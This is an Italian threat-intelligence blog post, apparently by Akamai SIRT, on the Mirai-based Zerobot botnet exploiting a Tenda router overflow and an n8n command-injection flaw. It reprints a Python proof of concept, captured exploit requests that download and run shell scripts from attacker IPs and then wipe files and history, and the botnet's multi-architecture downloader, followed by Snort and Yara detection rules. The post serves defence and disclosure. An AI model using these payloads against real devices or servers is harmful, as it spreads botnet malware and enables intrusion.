Analisi riassuntiva
- Il SIRT (Security Intelligence and Response Team) di Akamai ha identificato uno sfruttamento attivo delle vulnerabilità CMDi (Command injection) CVE-2025-7544 e CVE-2025-68613 sui router Tenda AC1206 e sulla piattaforma di automazione n8n.
- Il SIRT ha identificato questa attività nella nostra rete globale di honeypot per la prima volta a gennaio 2026. Si tratta del primo episodio di sfruttamento attivo di queste vulnerabilità che è stato segnalato dalla loro divulgazione iniziale, rispettivamente, a luglio 2025 e a dicembre 2025.
- In questo blog, abbiamo incluso un elenco di indicatori di compromissione (IoC) per aiutarvi a difendervi da questa minaccia.
Introduzione
Il SIRT di Akamai ha scoperto una campagna di malware basata su Mirai, soprannominata Zerobot, che ha preso di mira una serie di recenti CVE, tra cui quelle che interessano i router Tenda AC1206 e la piattaforma di automazione dei workflow n8n. La campagna di botnet risale almeno all'inizio di dicembre 2025, con i recenti exploit identificati nella nostra rete globale di honeypot a metà gennaio 2026 per diffondere una variante del malware Mirai.
Prendere di mira la vulnerabilità della piattaforma n8n è particolarmente interessante: Le botnet, in genere, sfruttano i dispositivi IoT (Internet of Things), come videocamere di sicurezza, DVR e router, ma la piattaforma n8n rientra in una categoria completamente diversa.
Sebbene non si tratti di un comportamento completamente nuovo per le botnet, questo tipo di exploit rappresenta un pericolo maggiore per le organizzazioni perché aumenta i rischi dell'infrastruttura più importante in quanto lo sfruttamento della piattaforma n8n potrebbe consentire ad un criminale di effettuare il movimento laterale.
Le vulnerabilità prese di mira
Le osservazioni del SIRT indicano che la campagna Zerobot sta prendendo di mira due diverse vulnerabilità: la CVE-2025-7544 e la CVE-2025-68613. I tentativi di sfruttamento nei nostri honeypot risalgono ad un periodo successivo alla divulgazione pubblica delle CVE a conferma che per queste vulnerabilità non si è trattato di attacchi zero-day.
Lo sfruttamento opportunistico delle vulnerabilità recentemente divulgate dai criminali è piuttosto comune oggi. Anche le organizzazioni più astute che applicano le patch richieste, spesso, rimangono vulnerabili per un periodo di tempo dopo la divulgazione iniziale e alcune di esse trascurano di applicare le patch necessarie ai propri dispositivi.
Dettagli della CVE-2025-7544
Pubblicata a metà luglio 2025, la CVE-2025-7544 è un overflow del buffer remoto basato su stack che interessa l'endpoint /goform/setMacFilterCfg nei dispositivi Tenda AC1206 sulla versione 15.03.06.23 che è stata classificata come critica e può essere sfruttata tramite il parametro deviceList. A causa della funzione parse_macfilter_rule, le variabili s (tecnicamente v3) vengono passate alla funzione strcpy senza alcun controllo sulla loro lunghezza, che può superare la destinazione del buffer basato su stack (ovvero s_2).
Richiedendo la pagina, un criminale, anche da remoto, potrebbe facilmente eseguire un attacco DoS (Denial-of-Service) o un'esecuzione di codice remoto (RCE). È disponibile una PoC (Proof-of-Concept) pubblica che analizza la vulnerabilità e la sfrutta in modo più dettagliato (Figura 1).
import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
"macFilterType": "white",
"deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)Dettagli della CVE-2025-68613
Pubblicata a metà dicembre 2025, la CVE-2025-68613 è una vulnerabilità RCE che interessa il sistema di valutazione dell'espressione del workflow nella relativa piattaforma di automazione n8n (nelle versioni dalla 0.211.0 alla 1.20.4, quindi 1.21.1 e 1.22.0) ed è stata classificata come critica.
Nella piattaforma n8n, gli utenti possono scrivere le espressioni nei workflow per elaborare i dati in modo dinamico, ma queste espressioni non sono state valutate con un sandboxing appropriato, consentendo ai criminali di analizzare il contesto di esecuzione previsto per eseguire codice arbitrario sul server. Eseguendo queste espressioni sul sistema sottostante, un criminale potrebbe anche leggere e scrivere i file sul server, rubare le variabili di ambiente come le chiavi API e applicare la persistenza.
La vulnerabilità è piuttosto facile da sfruttare perché richiede un solo login utente senza privilegi amministrativi per accedere a tutti i dati a cui la piattaforma n8n ha accesso. Molte organizzazioni utilizzano la piattaforma n8n per una varietà di scopi, come l'integrazione di database con i servizi cloud, l'elaborazione automatica dei dati, la gestione dei dati sensibili e la connessione di piattaforme e sistemi interni diversi. Per questa vulnerabilità è anche disponibile uno sfruttamento PoC pubblico.
Sfruttamento attivo dei router Tenda e della piattaforma n8n
Il SIRT di Akamai ha scoperto tentativi di sfruttamento attivo della CVE-2025-7544 da parte della campagna Zerobot nella nostra rete globale di honeypot a partire da metà gennaio 2026. Come si può vedere nella Figura 2, il tentativo di exploit attiva l'overflow del buffer tramite l'uso di 500 caratteri "A" nel parametro deviceList, che consente di eseguire il relativo codice arbitrario. L'exploit scarica ed esegue uno script della shell dannoso chiamato tol.sh dall'indirizzo IP 144.172.100.228 negli Stati Uniti.
/goform/setMacFilterCfg
macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -cIl SIRT ha, inoltre, osservato che la campagna Zerobot tentava di sfruttare una delle recenti vulnerabilità della piattaforma n8n: la CVE-2025-68613 (Figura 3). La funzionalità è sostanzialmente la stessa dell'altro tentativo di exploit, che scarica ed esegue lo script della shell tol.sh per recuperare e caricare il payload principale del malware Mirai di zerobotv9.
/rest/workflow/run
{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}
Sebbene non sia inconsueto prendere di mira la piattaforma n8n da parte di una botnet basata su Mirai, si tratta di una notevole deviazione dallo sfruttamento tipico dei dispositivi IoT. La possibilità che una botnet possa ottenere accesso e persistenza, nonché utilizzare il movimento laterale, nell'infrastruttura critica di un'organizzazione è sicuramente motivo di preoccupazione.
La botnet Zerobot
Lo script della shell nella Figura 4 recupera ed esegue il payload principale del malware basato su Mirai, denominato zerobotv9, che supporta una varietà di architetture diverse, come avviene solitamente per i downloader Mirai. Il payload UPX è dotato di una varietà di stringhe e parametri crittografati, tra cui un dominio C2 (Command and Control) di 0bot.qzz[.]io, e la stringa di esecuzione della console del malware Mirai comune, che, in questo caso, è "bruh why again".
Il moniker Zerobot risale ad un articolo di Fortinet del 2022, ma non si sa se i criminali coinvolti siano correlati. La nomenclatura indica che si tratta della nona iterazione del malware Zerobot, ma le altre otto versioni rimangono da vedere.
Oltre alla scoperta iniziale del 2022, abbiamo trovato campioni di malware pubblici denominati zerobotv2, che risalgono all'agosto 2025, ma sembrano essere la variante malware LZRD Mirai comunemente utilizzata.
#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4Esistono diverse differenze tra il malware Zerobot originale del 2022 e i campioni Zerobotv9 più recenti. La principale differenza consiste nel fatto che l'originale è molto più grande come dimensione del file ed è scritto in Go; invece, Zerobotv9 è più piccolo e non è scritto in Go.
Tuttavia, abbiamo trovato alcuni campioni classificati come Zerobot e provenienti dall'indirizzo IP del downloader originale che risalgono ad ottobre 2022 e non sono stati scritti in Go. Sia questa variante di ottobre 2022 che Zerobotv9 utilizzano la stessa chiave XOR originale del malware Mirai di 0XDEADBEEF, o 0x22.
Questa versione più recente dispone, inoltre, di varie funzioni di attacco che non erano presenti in precedenza, come TCPXmas, Mixamp, SSH e un metodo di attacco denominato Discord. Gli User-Agent codificati sono visibili nella Figura 5.
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94Sfruttamento aggiuntivo
Sebbene lo sfruttamento attivo dei dispositivi Tenda e della piattaforma n8n rappresenti la parte più importante di questo blog, il SIRT ha anche notato che la campagna Zerobot sta prendendo di mira altre vulnerabilità, tra cui la CVE-2017-9841 (Figura 6), la CVE-2021-3129 (Figura 7) e la CVE-2022-22947 (Figura 8).
Questi tentativi differiscono leggermente dai tentativi di sfruttamento evidenziati, in quanto utilizzano netcat e socat per aprire una connessione TCP non elaborata e leggere i dati dal socket sullo stdout, seguiti dai comandi necessari per eseguire lo script allo scopo di caricarli sul payload principale del malware Mirai.
I criminali hanno utilizzato questo metodo anche sulle vulnerabilità della piattaforma n8n e dei router Tenda, presentando una serie di fallback, come ad esempio il socket Perl, il reindirizzamento Bash TCP, il socket PHP e il socket Python. Questa tecnica è stata quella utilizzata per la prima volta all'inizio di dicembre 2025, prima di passare all'uso di strumenti come curl e wget a gennaio 2026.
Conclusione
Sfortunatamente, Mirai continua a proliferare nonostante i recenti interventi di blocco da parte delle forze dell'ordine in quanto la configurazione di una botnet basata su Mirai può presentare una barriera facilmente aggirabile per l'accesso. Facendosi attirare dalla prospettiva di realizzare facili guadagni o, semplicemente, provare esperienze da brivido, anche un criminale relativamente inesperto può riutilizzare un vecchio codice Mirai con alcune piccole modifiche o, persino, reiterarlo utilizzando strumenti basati sull'intelligenza artificiale.
La ricerca e lo sviluppo per produrre exploit zero-day non sono necessari, in quanto può risultare alquanto efficace sfruttare le CVE recentemente divulgate o i dispositivi hardware non aggiornati in modo negligente da alcune organizzazioni. Questo fenomeno potrebbe non portare alla diffusione di un'enorme botnet, come Aisuru, ma può comunque produrre profitti per gli operatori e consentire loro di eludere più facilmente il monitoraggio.
La divulgazione rappresenta un netto vantaggio
Come abbiamo segnalato in precedenza, il programma delle CVE può, talvolta, rappresentare un'arma a doppio taglio, perché mette in luce delle vulnerabilità che altrimenti potrebbero non essere state rilevate dai criminali. Sebbene riteniamo che questo programma rappresenti ancora un vantaggio netto per il settore, è importante considerare che i criminali monitorano comunemente queste informazioni per individuare eventuali opportunità di sfruttamento prima che le organizzazioni possano applicare le patch corrette in modo efficace.
Le vulnerabilità dei router Tenda e delle piattaforme n8n sfruttate dalla campagna Zerobot presentavano exploit PoC pubblici, che possono aumentare notevolmente la facilità e la diffusione dello sfruttamento attivo. Considerando soprattutto che la piattaforma n8n viene, talvolta, utilizzata nei workflow più critici da parte delle organizzazioni, si consiglia vivamente a tutte le organizzazioni potenzialmente interessate di salvaguardare e applicare le corrette patch ai loro sistemi il prima possibile per proteggersi da questa o da altre attività dannose.
Tenetevi aggiornati con noi
Il SIRT di Akamai continuerà a monitorare e a segnalare minacce come queste per i clienti dell'azienda e per la più vasta comunità della sicurezza. Per tenervi aggiornati sulle ultime novità del SIRT e su altre pubblicazioni dell'Akamai Security Intelligence Group, potete consultare la nostra pagina relativa ai lavori di ricerca e seguirci sui social media.
IOC
Abbiamo incluso un elenco di indicatori di compromissione (IoC), nonché di regole Snort e Yara, per aiutare i team addetti alla sicurezza.
Regole Snort per gli IP dannosi
alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Regole Snort per il rilevamento della risoluzione dei domini C2
alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)Regole Yara per i campioni di malware
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-01-29"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$bruh = "bruh why again"
$url1 = "mamakmukekkontol"
$url2 = "inihiddenngentod"
$ip1 = "140.233.190.96"
$ip2 = "144.172.100.228"
$ip3 = "172.86.123.179"
$ip4 = "216.126.227.101"
$ip5 = "103.59.160.237"
$domain1 = "0bot.qzz.io"
$domain2 = "andro.notemacro.com"
$domain3 = “pivot.notemacro.com”
$hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
$hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
$hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
$hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
$hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
$hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
$hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
$hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
$hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
$hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"
condition:
(
$url1 or
$url2 or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9 or
$hash10
)
}Indirizzi IPv4 dannosi
103.59.160.237
140.233.190.96
144.172.100.228
172.86.123.179
216.126.227.101
Domini dannosi
0bot.qzz.io
andro.notemacro[.]com/inihiddenngentod/zerobotv9.*
pivot.notemacro.com/inihiddenngentod/zerobotv9.*
Hash SHA256
c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f
360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da
cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24
045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57
d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7
deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060
6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e
2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3
263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c
d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616
Tag
